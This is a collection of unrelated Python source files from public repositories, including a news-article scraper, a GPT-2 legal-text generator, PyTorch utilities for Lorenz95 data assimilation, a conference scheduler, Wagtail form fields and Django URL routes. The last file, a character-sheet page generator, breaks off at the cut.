#Open and read. Create calais variable.\n\n reporterDict = {}\n kc = 0\n articlelist = []\n linecount = []\n length_count = []\n endbody_count= []\n bodylist= []\n opinionlist = []\n\n\n #Open some Dicts and lists. Counter is used to form Dict keys below.\n\n\n for line in journolist:\n if 'DOCUMENTS' in line:\n linecount.append(journolist.index(line))\n\n #Making a list that saves index for start of each new article in journolist.\n\n ticker = 0\n while ticker <= len(linecount) - 1:\n if ticker < len(linecount) - 1:\n articlelist.append(journolist[linecount[ticker]:\n linecount[ticker+1]- 1])\n if ticker == len(linecount) - 1:\n articlelist.append(journolist[linecount[ticker]:])\n ticker = ticker + 1\n\n #Nested list of lines into a list of articles.\n\n for article in articlelist:\n kc = kc + 1\n \n for line in article:\n if 'DOCUMENTS' in line:\n medialine = journolist[journolist.index(line)+3]\n \n if medialine == '\\n':\n medialine = journolist[journolist.index(line)+4]\n\n medialine.strip(\"'\")\n medialine.strip('\\n')\n\n if 'LENGTH' in line:\n length_count.append(articlelist[kc-1].index(line))\n stripped_length = line.strip('LENGTH:')\n stripped_length.strip('\\n')\n\n \n #Save outlet, lengths, and index for LENGTH and \"All rights...\" to a variable\n \n if 'BYLINE' in line:\n stripped_line = line.strip('BYLINE:')\n stripped_line.strip('\\n')\n\n if 'SECTION' in line:\n opinion_line = line.lower()\n if 'editorial' in opinion_line or 'commentary' in opinion_line:\n opinion = 'Opinion'\n else:\n opinion = 'Not Opinion'\n\n\n #Save bylines and whether or not opinion to a variable\n\n if 'BYLINE' not in str(article):\n stripped_line = 'NA'\n\n if 'LENGTH' not in str(article):\n length_count.append('NA')\n\n if 'SECTION' not in str(article):\n opinion = 'Not Opinion'\n\n #Mark as NA for those without byline.\n\n body = articlelist[kc-1][length_count[kc-1] + 2:-3]\n\n bodystring = ''.join(body)\n result = calais.analyze(bodystring)\n\n #Saves the body between LENGTH line and Copyright line, then analyzes in Calais.\n\n itemlist = []\n for item in result.entities:\n if 'Organization' in item['_type']:\n itemlist.append(item['name'])\n\n orglist = []\n for a in itemlist:\n b = a.replace('\\n', ' ')\n orglist.append(b)\n\n topiclist = []\n try:\n for sublist in result.topics:\n topiclist.append(sublist['categoryName'])\n\n except AttributeError:\n topiclist = ['None']\n\n #Pull Calais results for Organizations out and save to orglist.\n\n reporterDict[kc] = [medialine.strip()]\n reporterDict[kc].append(stripped_line.strip())\n reporterDict[kc].append(stripped_length.strip())\n reporterDict[kc].append(orglist)\n reporterDict[kc].append(opinion)\n reporterDict[kc].append(topiclist)\n \n #Drop variables into dictionary.\n\n export_name = 'C:/Users/Naironi/Documents/School Docs 6/SocNet/output' + str(itr) + '.csv'\n\n utilities.writeDictToCSV(reporterDict, export_name)\n\n itr = itr + 1\n\n #Iterate up the export.\n\n","repo_name":"snydermc/socnethomework","sub_path":"media-scraper-iteration6.py","file_name":"media-scraper-iteration6.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33112761253","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Create Date: 2023/5/20 17:10\n\"\"\"Description:本地推理接口\n\"\"\"\nimport json\n\nimport fire\nimport torch\nfrom transformers import BertTokenizer, GPT2LMHeadModel, TextGenerationPipeline\n\n\ndef generate(datas, tokenizer, model):\n \"\"\"预测数据\n :param datas: json格式的数据\n :param tokenizer: tokenizer实例\n :param model: 模型实例\n :return:\n \"\"\"\n def output_format(text):\n text = text.split(\"。本院认为,\")[1].split(\"<生成结束>\")[0]\n return text\n\n question_list = []\n for d_one in datas:\n question_list.append(d_one[\"input\"].rstrip(\"。\").rstrip(\"。本院认为,\") + \"。本院认为,\")\n\n text_generator = TextGenerationPipeline(model, tokenizer, device=0)\n text_generator.tokenizer.pad_token_id = text_generator.model.config.eos_token_id\n generate_output_list = text_generator(question_list,\n max_length=1020,\n num_beams=1, top_p=0.8,\n num_return_sequences=1,\n eos_token_id=50256,\n pad_token_id=text_generator.model.config.eos_token_id)\n\n for d_one, g_one in zip(datas, generate_output_list):\n d_one[\"model_output\"] = output_format(g_one[0][\"generated_text\"].replace(\" \", \"\"))\n return datas\n\n\ndef main(\n base_model: str = \"\",\n input_file: str = \"\",\n output_file: str = \"\",\n):\n \"\"\"\n :param base_model: 模型地址\n :param input_file: 输入文件地址\n :param output_file: 输出文件地址\n :return:\n \"\"\"\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n tokenizer = BertTokenizer.from_pretrained(base_model)\n model = GPT2LMHeadModel.from_pretrained(base_model).to(device)\n\n with open(input_file, \"r\") as f:\n datas = json.load(f)\n\n generate_datas = generate(datas, tokenizer=tokenizer, model=model)\n\n with open(output_file, \"w\") as f:\n json.dump(generate_datas, f, indent=3, ensure_ascii=False)\n print(\"finish!!!\")\n\n\nif __name__ == \"__main__\":\n fire.Fire(main)","repo_name":"seussg/JurisLMs","sub_path":"aijudge/demo/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"13211648988","text":"#!/usr/bin/env python3\n\nnum = input(\"enter a number: \")\n\nevenOrOdd = \"odd\"\nprimeOrNot = \"prime\"\n\nif int(num) % 2 == 0:\n evenOrOdd = \"even\"\n\nfor i in range(2, (int(num)-1)):\n if int(num) % i == 0:\n primeOrNot = \"not prime\"\n\n\nprint (\"{n} is an {e} number, and {p}\".format(n=num, e=evenOrOdd, p=primeOrNot))\n","repo_name":"vjkancherla/Python-Examples","sub_path":"old_code/03-OddOrEven.py","file_name":"03-OddOrEven.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34295855534","text":"import torch\nimport torch.nn as nn\nimport lorenz95 as l95\nfrom torch.nn import Module\nfrom torch.distributions.multivariate_normal import MultivariateNormal\n\n\ndef requires(test, s=\"\"):\n \"\"\"\n raise an error with text str is the test fails\n test: Bool\n s: String\n return : None\n \"\"\"\n if (not test):\n raise NameError(s)\n\n\ndef vec_to_inds(x_dim, vec_dim):\n \"\"\"\n Computes the indices of scale_tril coeffs,\n scale_tril is filled main diagonal first\n\n x_dim: dimension of the random variable\n vec_dim: dimension of the vector containing the coeffs of loc and scale_tril\n \"\"\"\n ldiag, d, c = x_dim, 0, 0 # diag length, diag index, column index\n inds = [[], []] # list of line and column indexes\n for i in range(vec_dim - x_dim): # loop over the non-mean coeff\n inds[0].append(c+d) # line index\n inds[1].append(c) # column index\n if c == ldiag-1: # the current diag end is reached\n ldiag += -1 # the diag length is decremented\n c = 0 # the column index is reinitialized\n d += 1 # the diag index is incremented\n else: # otherwize, only the column index is incremented\n c += 1\n return inds\n\n\nclass FcZero(Module):\n \"\"\"\n Fully connected neural network with ReZero trick\n \"\"\"\n def __init__(self, layers):\n \"\"\"\n layers: the list of the layers dimensions\n \"\"\"\n Module.__init__(self)\n n = len(layers)\n self.lins = nn.ModuleList(\n [nn.Linear(d0, d1) for d0, d1 in zip(layers[:-1], layers[1:])])\n self.acts = nn.ModuleList([nn.LeakyReLU()]*(n-1))\n self.alphas = torch.nn.Parameter(torch.zeros(n-1))\n\n def forward(self, h, t):\n for lin, act, alpha in zip(self.lins[:-1], self.acts, self.alphas):\n h = h + alpha*act(lin(h))\n return self.lins[-1](h)\n\n\nclass Gaussian(MultivariateNormal):\n \"\"\"\n A Gaussian pdf inheriting pytorch's Gaussian pdfs\n \"\"\"\n\n def __init__(self, *args):\n \"\"\"\n args is either a (loc, scale_tril) or a (x_dim, vec)\n \"\"\"\n\n # args is a (x_dim, vec)\n if isinstance(args[0], int):\n x_dim, vec = args\n vec_dim = vec.size(-1)\n if vec_dim == x_dim + 1:\n loc = vec[:, :x_dim]\n scale_tril = torch.eye(x_dim)\\\n .reshape((1, x_dim, x_dim))\\\n .repeat(vec.size(0), 1, 1)\n scale_tril = torch.exp(vec[:, x_dim])\\\n .view(vec.size(0), 1, 1)*scale_tril\n else:\n inds = vec_to_inds(x_dim, vec_dim)\n loc = vec[:, :x_dim]\n lbda = torch.cat(\n (torch.exp(vec[:, x_dim:2*x_dim]), # ensures positive diag\n vec[:, 2*x_dim:]), 1)\n scale_tril = torch.zeros(vec.size(0), x_dim, x_dim)\n scale_tril[:, inds[0], inds[1]] = lbda\n MultivariateNormal.__init__(self, loc=loc, scale_tril=scale_tril)\n\n # args is a loc, scale_tril\n else:\n MultivariateNormal.__init__(self, loc=args[0], scale_tril=args[1])\n\n self.dim = self.event_shape[0] # the RV dimension USELESS\n\n def margin(self):\n \"\"\"\n If self is a pdf over (x0, x1),\n return is the pair of marginals pdfs of x0 and x1\n \"\"\"\n\n n01 = self.mean.size(-1)\n requires(n01 % 2 == 0, \"the RV dim is not pair\")\n n = n01 // 2\n \"\"\"\n The Multivariate-Normal class may not accept rectangular scale_tril\n so the covariance of x1 should be computed,\n then a Cholesky decomposition is performed to get L1, its sqrt.\n \"\"\"\n loc01 = self.mean\n loc0, loc1 = loc01[:, :n], loc01[:, n:]\n L01 = self.scale_tril\n L0 = L01[:, :n, :n]\n C01 = self.covariance_matrix\n C1 = C01[:, n:, n:]\n L1 = torch.cholesky(C1)\n return Gaussian(loc0, L0), Gaussian(loc1, L1)\n\n\nclass Id():\n \"\"\"\n Dumb Id class behaving like a id function\n \"\"\"\n def __init__(self):\n pass\n\n def __call__(self, x, t):\n return x\n\n\nclass Lorenz_cpdf():\n \"\"\"\n A Gaussian cpdf having lorenz95 as mean and a cst cov matrix\n \"\"\"\n def __init__(self, sigma_Q=0.1, Ndt=1, dt=0.05):\n self.Ndt = Ndt\n self.dt = dt\n self.sigma_Q = sigma_Q\n\n def __call__(self, x, t):\n \"\"\"\n Making Lambda_Q here allows to use x's dimensions\n but may be bad for performance\n \"\"\"\n Lambda_Q = self.sigma_Q*torch.eye(x.size(-1))\\\n .expand(x.size(0), -1, -1)\n return Gaussian(l95.M(x, self.Ndt, self.dt), Lambda_Q)\n\n\nclass Id_mu_cpdf():\n \"\"\"\n A Gaussian cpdf having id as mean and a cst cov matrix\n \"\"\"\n def __init__(self, sigma_R=1):\n self.sigma_R = sigma_R\n\n def __call__(self, x, t):\n \"\"\"\n Making Lambda_R here allows to use x's dimensions\n but may be bad for performance\n \"\"\"\n Lambda_R = self.sigma_R*torch.eye(x.size(-1))\\\n .expand(x.size(0), -1, -1)\n return Gaussian(x, Lambda_R)\n\n\nclass FcZero_mu_cst_Lambda_cpdf(Module):\n \"\"\"\n A Gaussian cpdf having a FcZero net as mean\n and a cst matrix as cov\n \"\"\"\n def __init__(self, layers, vec_dim):\n Module.__init__(self)\n x_dim = layers[-1]\n self.loc = FcZero(layers)\n self.scale_vec = nn.Parameter(torch.zeros(vec_dim - x_dim))\n\n def forward(self, x, t):\n loc_ = self.loc(x, t)\n vec = torch.cat((loc_, self.scale_vec.expand(x.size(0), -1)), 1)\n return Gaussian(loc_.size(-1), vec)\n\n\nclass Id_mu_cst_Lambda_cpdf(Module):\n \"\"\"\n A Gaussian cpdf having id as mean\n and a learnable cst matrix as cov\n \"\"\"\n def __init__(self, x_dim, vec_dim):\n \"\"\"\n n: mu dimension\n ndiag: number of learnable\n \"\"\"\n Module.__init__(self)\n self.scale_vec = nn.Parameter(torch.zeros(vec_dim - x_dim))\n\n def forward(self, x, t):\n vec = torch.cat((x, self.scale_vec.expand(x.size(0), -1)), 1)\n return Gaussian(x.size(-1), vec)\n\n\nclass Lorenz_mu_cst_Lambda_cpdf(Module):\n \"\"\"\n A Gaussian cpdf having l95 as mean\n and a learnable cst matrix as cov\n \"\"\"\n def __init__(self, x_dim, vec_dim, Ndt=1, dt=0.05):\n \"\"\"\n n: mu dimension\n ndiag: number of learnable\n \"\"\"\n Module.__init__(self)\n self.scale_vec = nn.Parameter(torch.zeros(vec_dim - x_dim))\n self.Ndt = Ndt\n self.dt = dt\n\n def forward(self, x, t):\n vec = torch.cat((l95.M(x, self.Ndt, self.dt),\n self.scale_vec.expand(x.size(0), -1)), 1)\n return Gaussian(x.size(-1), vec)\n\n\nclass FcZero_cpdf(Module):\n \"\"\"\n A Gaussian cpdf from a FcZero net,\n the net outputs a vec that is transformed into a Gaussian\n \"\"\"\n\n def __init__(self, dim, layers):\n Module.__init__(self)\n self.f = FcZero(layers)\n self.dim = dim\n\n def forward(self, x, t):\n return Gaussian(self.dim, self.f(x, t))\n\n\nclass RK_mu_cst_Lambda_cpdf(Module):\n def __init__(self, x_dim, vec_dim, window=(-2, -1, 0, 1), N=1, dt=0.05):\n Module.__init__(self)\n self.x_dim = x_dim\n self.vec_dim = vec_dim\n self.scale_vec = nn.Parameter(torch.zeros(vec_dim - x_dim))\n self.N = N\n self.dt = dt\n self.window = window\n self.diameter = len(window)\n self.lin = nn.Linear(in_features=self.diameter,\n out_features=1,\n bias=True)\n self.bil = nn.Bilinear(in1_features=self.diameter,\n in2_features=self.diameter,\n out_features=1,\n bias=False)\n\n def EDO(self, x):\n v = torch.cat(\n [torch.roll(x.unsqueeze(1), i, 2) for i in self.window], 1)\n v = torch.transpose(v, 1, 2)\n v_flat = v.reshape(-1, self.diameter)\n dx = self.lin(v_flat) + self.bil(v_flat, v_flat)\n return dx.view(x.size(0), x.size(1))\n\n def RK(self, x):\n for _ in range(self.N):\n k1 = self.EDO(x)\n k2 = self.EDO(x + 0.5*self.dt*k1)\n k3 = self.EDO(x + 0.5*self.dt*k2)\n k4 = self.EDO(x + self.dt*k3)\n x = x + (self.dt/6.0)*(k1 + 2.0*k2 + 2.0*k3 + k4)\n return x\n\n def forward(self, x, t):\n y = self.RK(x)\n vec = torch.cat((y, self.scale_vec.expand(x.size(0), -1)), 1)\n return Gaussian(x.size(-1), vec)\n\n\n# Auxiliary losses\ndef loss_aux(key, q01b, q01a, x01):\n \"\"\"\n key: string, the loss name\n q01b: prior pdf over 2 consecutive states\n q01a: posterior pdf over 2 consecutive states\n x01: true state\n \"\"\"\n n01 = q01b.dim\n requires(n01 % 2 == 0, \"the RV dim is not pair\")\n n = n01 // 2\n if key == \"logpdf_01b\":\n return -torch.mean(q01b.log_prob(x01))\n elif key == \"logpdf_01a\":\n return -torch.mean(q01a.log_prob(x01))\n elif key == \"rmse_0b\":\n return torch.mean(\n torch.norm(\n x01[:, :n]-q01b.mean[:, :n], dim=1)/(n**0.5))\n elif key == \"rmse_1b\":\n return torch.mean(\n torch.norm(\n x01[:, n:]-q01b.mean[:, n:], dim=1)/(n**0.5))\n elif key == \"rmse_0a\":\n return torch.mean(\n torch.norm(\n x01[:, :n]-q01a.mean[:, :n], dim=1)/(n**0.5))\n elif key == \"rmse_1a\":\n return torch.mean(\n torch.norm(\n x01[:, n:]-q01a.mean[:, n:], dim=1)/(n**0.5))\n else:\n raise NameError(key + \" is not defined in loss_aux\")\n\n\ndef print_last(**kwargs):\n \"\"\"\n prints the output dict last values\n \"\"\"\n for key, val in kwargs.items():\n if isinstance(val, type([])):\n if val == []:\n s = \"\"\n else:\n s = '{:.2e}'.format(val[-1])\n else:\n s = str(val)\n print(key + \" = \" + s)\n\n\ndef save_dict(prefix, **kwargs):\n \"\"\"\n saves the output dict\n \"\"\"\n for key, val in kwargs.items():\n torch.save(val, prefix + key + \".pt\")\n","repo_name":"AnthonyFillion-UnivToulouse/VAA","sub_path":"aux.py","file_name":"aux.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24317817194","text":"import csv, argparse\nfrom talks import Talk, TalksList\nfrom conference import Conference\nimport pdb\n\ndef main():\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-p\", \"--path\", required=True, help=\"path csv file containing talks\")\n\targs = vars(ap.parse_args())\n\n\t# Load arguments\n\tfile_name = args['path']\n\n\t# Global variables\n\tn_days = 3 # (days)\n\tstarting_time = 9 # (hours)\n\tclosing_time = 17 # (hours)\n\tcleaning_break = 15 # (minutes)\n\tlunch_break = [12,13] # (hours)\n\n\t# Create talk list object\n\ttList = TalksList()\n\n\t# Load list of talks into the TalkList object\n\twith open(file_name, newline='') as csvfile:\n\t\ttalksreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n\t\tfor idx, row in enumerate(talksreader):\n\t\t\tif idx == 0:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\ttList.add_talk(Talk(row[0], row[1], row[2]))\n\n\t# Create Conference object\n\tconf = Conference(n_days, starting_time, closing_time, cleaning_break, lunch_break)\n\n\t# Fit list of talks into the conference\n\tconf.fit_talks(tList)\n\n\t# Load Agenda and print it\n\tagenda = conf.get_agenda()\n\tfor row in agenda:\n\t\tprint(row)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"saraRaris/Conference-planner","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74480053351","text":"import copy\nimport re\n\nfrom django.core import checks, validators\nfrom django.core.exceptions import ValidationError\nfrom django.forms import Media\nfrom django.utils.encoding import force_str\nfrom django.utils.text import capfirst\nfrom django.utils.translation import ugettext as _\n\nfrom wagtail.core.models import Page, Site\nfrom wagtail.core.utils import resolve_model_string\nfrom wagtail.documents import get_document_model\nfrom wagtail.images import get_image_model\n\n__all__ = [\n 'BooleanField',\n 'CharField',\n 'ChoiceField',\n 'DocumentChooserField',\n 'Field',\n 'ImageChooserField',\n 'IntegerField',\n 'ModelChooserField',\n 'PageChooserField',\n 'ReadOnlyCharField',\n 'RichTextField',\n 'TextField',\n]\n\n\nclass Field:\n '''Base class for all fields.'''\n args_list = [\n 'name',\n 'label',\n 'required',\n 'help_text',\n 'default',\n ]\n empty_values = list(validators.EMPTY_VALUES)\n default_validators = []\n default_error_messages = {\n 'required': _('This field is required.'),\n }\n default_value = None\n\n def __init__(self, required=True, validators=(), help_text='', error_messages=None, label=None, default=None):\n self._required = required\n self._name = ''\n self._label = None\n self._default = None\n self.help_text = help_text\n self.default = default\n\n if label is not None:\n self.label = label\n\n messages = {}\n for c in reversed(self.__class__.__mro__):\n messages.update(getattr(c, 'default_error_messages', {}))\n messages.update(error_messages or {})\n self.error_messages = messages\n\n self.validators = [*self.default_validators, *validators]\n\n def __deepcopy__(self, memo):\n result = copy.copy(self)\n memo[id(self)] = result\n result.error_messages = self.error_messages.copy()\n result.validators = self.validators[:]\n return result\n\n def get_args(self):\n '''Returns the arguments needed to reproduce this instance in JavaScript.'''\n args = {}\n for name in self.args_list:\n args[name] = getattr(self, name)\n\n if 'default' in args:\n if args.get('default', None) is None:\n # do not render a \"default\" argument if the default value is None.\n del args['default']\n else:\n # we have to convert to JSON to ensure that the output is valid JavaScript\n args['default'] = self.to_json(args['default'])\n return args\n\n def get_dependencies(self):\n '''If this field depends on any other blocks then override this method and return them here.'''\n return {}\n\n @property\n def media(self):\n '''Allow the field to pass Media objects out to the `altstreamfield.fields.BlockInput` widget.'''\n return None\n\n def to_python(self, value):\n '''Converts the JSON value to an equivalent Python value.'''\n return value\n\n def to_json(self, value):\n '''Converts the Python value to an equivalent JSON value (a value that can be passed to json.dump).'''\n return value\n\n def validate(self, value):\n '''Does basic validation that cannot be done with validators.\n\n Override this method to perform custom validation.\n '''\n if value in self.empty_values and self._required:\n raise ValidationError(self.error_messages['required'], code='required')\n\n def run_validators(self, value):\n '''Runs registered validators against the value and raises a ValidationError if any validators fail.'''\n if value in self.empty_values:\n return\n errors = []\n for v in self.validators:\n try:\n v(value)\n except ValidationError as e:\n if hasattr(e, 'code') and e.code in self.error_messages:\n e.message = self.error_messages[e.code]\n errors.extend(e.error_list)\n if errors:\n raise ValidationError(errors)\n\n def clean(self, value):\n value = self.to_python(value)\n self.validate(value)\n self.run_validators(value)\n return value\n\n def check(self):\n return []\n\n def _check_name(self, name):\n \"\"\"Helper method called as part of the system checks framework, to\n validate that the passed in name is a valid identifier.\n \"\"\"\n errors = []\n if not name:\n errors.append(checks.Error(\n \"Field name %r is invalid\" % name,\n hint=\"Field name cannot be empty\",\n obj=self,\n id='altstreamfield.E001',\n ))\n\n if ' ' in name:\n errors.append(checks.Error(\n \"Field name %r is invalid\" % name,\n hint=\"Field names cannot contain spaces\",\n obj=self,\n id='altstreamfield.E001',\n ))\n\n if '-' in name:\n errors.append(checks.Error(\n \"Field name %r is invalid\" % name,\n \"Field names cannot contain dashes\",\n obj=self,\n id='altstreamfield.E001',\n ))\n\n if name and name[0].isdigit():\n errors.append(checks.Error(\n \"Field name %r is invalid\" % name,\n \"Field names cannot begin with a digit\",\n obj=self,\n id='altstreamfield.E001',\n ))\n\n return errors\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, value):\n self._name = value\n\n @property\n def label(self):\n if self._label is not None:\n return self._label\n else:\n return capfirst(self._name.replace('_', ' '))\n\n @label.setter\n def label(self, label):\n self._label = label\n\n @property\n def default(self):\n return self._default\n\n @default.setter\n def default(self, default):\n self._default = default\n\n @property\n def required(self):\n return self._required\n\n\nclass CharField(Field):\n '''Represents a single line of text.'''\n args_list = Field.args_list + [\n 'strip',\n 'min_length',\n 'max_length',\n ]\n\n def __init__(self, max_length=None, min_length=None, strip=True, **kwargs):\n super().__init__(**kwargs)\n self.strip = strip\n\n # prevent something dumb.\n if max_length and min_length and max_length < min_length:\n raise ValueError(\"Cannot have a max_length that is smaller than the min_length.\")\n\n self.max_length = max_length\n self.min_length = min_length\n\n if max_length is not None:\n self.validators.append(validators.MaxLengthValidator(int(max_length)))\n if min_length is not None:\n self.validators.append(validators.MinLengthValidator(int(min_length)))\n self.validators.append(validators.ProhibitNullCharactersValidator())\n\n def to_python(self, value):\n '''Ensures that the JSON value is converted to a proper Python string.'''\n if value not in self.empty_values:\n value = str(value)\n if self.strip:\n value = value.strip()\n if value in self.empty_values:\n return ''\n return value\n\n def get_searchable_content(self, value):\n return [force_str(value)]\n\n\nclass ReadOnlyCharField(CharField):\n '''This is a field that never allows a user to set the value.\n\n This is useful where the value needs to be controlled by code but the user\n needs to be aware of the value.\n '''\n args_list = [\n item for item in CharField.args_list\n if item not in ['max_length', 'min_length', 'required']\n ]\n\n def __init__(self, max_length=None, min_length=None, strip=True, **kwargs):\n super().__init__(max_length=None, min_length=None, strip=strip, **kwargs)\n\n @property\n def required(self):\n '''Read only fields should never be required.'''\n return False\n\n\nclass TextField(CharField):\n '''Represents multiple lines of text.'''\n pass\n\n\nclass IntegerField(Field):\n '''Represents and integer value.'''\n args_list = Field.args_list + [\n 'min_value',\n 'max_value',\n ]\n default_error_messages = {\n 'invalid': _('Enter a whole number.'),\n }\n re_decimal = re.compile(r'\\.0*\\s*$')\n\n def __init__(self, min_value=None, max_value=None, **kwargs):\n super().__init__(**kwargs)\n\n if min_value and max_value and max_value < min_value:\n raise ValueError('Cannot have a max_value that is less than the min_value.')\n\n self.min_value = min_value\n self.max_value = max_value\n\n if min_value is not None:\n self.validators.append(validators.MinValueValidator(min_value))\n if max_value is not None:\n self.validators.append(validators.MaxValueValidator(max_value))\n\n def to_python(self, value):\n '''Validate that int() can be called on the input. Return the result of int() or None for empty values.'''\n value = super().to_python(value)\n if value in self.empty_values:\n return None\n try:\n value = int(self.re_decimal.sub('', str(value)))\n except (ValueError, TypeError):\n raise ValidationError(self.error_messages['invalid'], code='invalid')\n return value\n\n\nclass BooleanField(Field):\n '''Represents a boolean value.'''\n\n def to_python(self, value):\n if isinstance(value, str) and value.lower() in ('false', '0'):\n value = False\n else:\n value = bool(value)\n return super().to_python(value)\n\n\nclass CallableChoiceIterator:\n def __init__(self, choices_func):\n self.choices_func = choices_func\n\n def __iter__(self):\n yield from self.choices_func()\n\n\nclass ChoiceField(Field):\n '''Represents a selection from a list of choices.'''\n args_list = Field.args_list + [\n 'choices',\n ]\n default_error_messages = {\n 'invalid_choice': _('Select a valid choice. %(value)s is not one of the available choices.'),\n }\n\n def __init__(self, choices=(), **kwargs):\n super().__init__(**kwargs)\n self.choices = choices\n\n def __deepcopy__(self, memo):\n result = super().__deepcopy__(memo)\n result._choices = copy.deepcopy(self._choices, memo)\n return result\n\n @property\n def choices(self):\n return self._choices\n\n @choices.setter\n def choices(self, value):\n if callable(value):\n value = CallableChoiceIterator(value)\n else:\n value = list(value)\n\n self._choices = value\n\n def to_python(self, value):\n '''Ensure that the value is a string or empty string.'''\n if value in self.empty_values:\n return ''\n return str(value)\n\n def validate(self, value):\n '''Custom validation to ensure that the value is in the list of choices.'''\n super().validate(value)\n if value and not self.valid_value(value):\n raise ValidationError(\n self.error_messages['invalid_choice'],\n code='invalid_choice',\n params={'value': value},\n )\n\n def valid_value(self, value):\n \"\"\"Check to see if the provided value is a valid choice.\"\"\"\n text_value = str(value)\n for k, v in self.choices:\n if isinstance(v, (list, tuple)):\n # This is an optgroup, so look inside the group for options\n for k2, v2 in v:\n if value == k2 or text_value == str(k2):\n return True\n else:\n if value == k or text_value == str(k):\n return True\n return False\n\n\nclass RichTextField(Field):\n '''Represents rich text.'''\n\n @property\n def media(self):\n return Media(\n js=[\n 'wagtailadmin/js/draftail.js',\n 'wagtailadmin/js/page-chooser-modal.js',\n 'wagtaildocs/js/document-chooser-modal.js',\n 'wagtailembeds/js/embed-chooser-modal.js',\n 'wagtailimages/js/image-chooser-modal.js',\n ],\n css={\n 'all': ['wagtailadmin/css/panels/draftail.css']\n }\n )\n\n\nclass ModelChooserField(Field):\n '''Base class for Model based chooser fields.'''\n model = None\n\n def to_python(self, value):\n '''Converts the JSON value to an equivalent Python value.'''\n if value is None:\n return None\n\n try:\n return self.model.objects.get(pk=value)\n except:\n raise ValidationError('Document with primary key {} does not exist.'.format(value))\n\n def to_json(self, value):\n '''Converts the Python value to an equivalent JSON value (a value that can be passed to json.dump).'''\n if isinstance(value, self.model):\n return value.pk\n elif str(value).isdigit():\n return int(value)\n else:\n return None\n\n\nclass DocumentChooserField(ModelChooserField):\n '''Represents a selection of a Wagtail document.'''\n @property\n def model(self):\n return get_document_model()\n\n @property\n def media(self):\n '''Allow the field to pass Media objects out to the `altstreamfield.fields.BlockInput` widget.'''\n return Media(\n js=['wagtaildocs/js/document-chooser-modal.js',],\n css={\n 'all': []\n }\n )\n\n\nclass ImageChooserField(ModelChooserField):\n '''Represents a selection of a Wagtail Image.'''\n @property\n def model(self):\n return get_image_model()\n\n @property\n def media(self):\n '''Allow the field to pass Media objects out to the `altstreamfield.fields.BlockInput` widget.'''\n return Media(\n js=[\n 'wagtailimages/js/image-chooser-modal.js',\n ],\n css={\n 'all': []\n }\n )\n\nclass PageChooserField(ModelChooserField):\n '''Represents a selection of a Wagtail Page.'''\n args_list = ModelChooserField.args_list + [\n 'target_model',\n 'can_choose_root',\n ]\n default_error_messages = {\n 'invalid-page': _('This page may not be chosen.'),\n }\n\n def __init__(self, target_model=None, can_choose_root=False, **kwargs):\n super().__init__(**kwargs)\n self._target_model = None\n if target_model:\n self._target_model = target_model\n\n self.can_choose_root = can_choose_root\n\n def validate(self, value):\n super().validate(value)\n\n if value and isinstance(value, Page):\n specific = value.specific\n if self.target_model and not isinstance(specific, self.target_model):\n raise ValidationError(self.error_messages['invalid-page'], code='invalid-page')\n\n if not self.can_choose_root and Site.objects.filter(root_page=value).exists():\n raise ValidationError(self.error_messages['invalid-page'], code='invalid-page')\n\n def get_args(self):\n args = super().get_args()\n if 'target_model' in args and args['target_model']:\n args['target_model'] = args['target_model']._meta.label\n return args\n\n @property\n def target_model(self):\n if isinstance(self._target_model, str):\n return resolve_model_string(self._target_model)\n return self._target_model\n\n @property\n def model(self):\n return Page\n\n @property\n def media(self):\n return Media(\n js=[\n 'wagtailadmin/js/page-chooser-modal.js',\n ]\n )","repo_name":"didorothy/wagtailaltstreamfield","sub_path":"altstreamfield/blocks/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":15800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"163922346","text":"\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"profile/\", views.profile, name=\"profile\"),\n path(\"following\", views.following, name=\"following\"),\n path(\"like/\",views.like, name=\"like\"),\n path(\"edit/\",views.edit, name=\"edit\"),\n path(\"follow/\", views.handle_follow, name = \"follow\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\")\n]\n","repo_name":"CMPSC297/project-4-1024","sub_path":"project-4-1024-newBranch/network/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25590418534","text":"from cgi_simple import (\n div, ensure_valid_attributes_and_contents, flex_col, flex_row, flex_wrapper,\n labeled_text_input, text_input,\n)\n\ndef create_page():\n return flex_row({'class': 'third-page'}, [\n flex_col({'class': 'sidebar'}, [\n feats_summary(),\n proficiencies(),\n archetypes(),\n inventory(),\n flex_col([\n flex_wrapper(div({'class': 'section-header'}, 'Experience')),\n div(text_input({'name': 'experience'})),\n ]),\n flex_col([\n flex_wrapper(div({'class': 'section-header'}, 'Wealth')),\n div(text_input({'name': 'wealth'})),\n ]),\n ]),\n flex_col({'class': 'main-body'}, [\n equipment(),\n abilities_summary(),\n personality(),\n ]),\n ])\n\ndef feats_summary():\n return flex_col({'class': 'feats-summary'}, [\n flex_row({'class': 'summary-header'}, [\n div({'class': 'summary-header-level section-header'}, 'Lvl'),\n div({'class': 'summary-header-name section-header'}, 'Feats'),\n ]),\n \"\".join([feat_row(i) for i in [1, 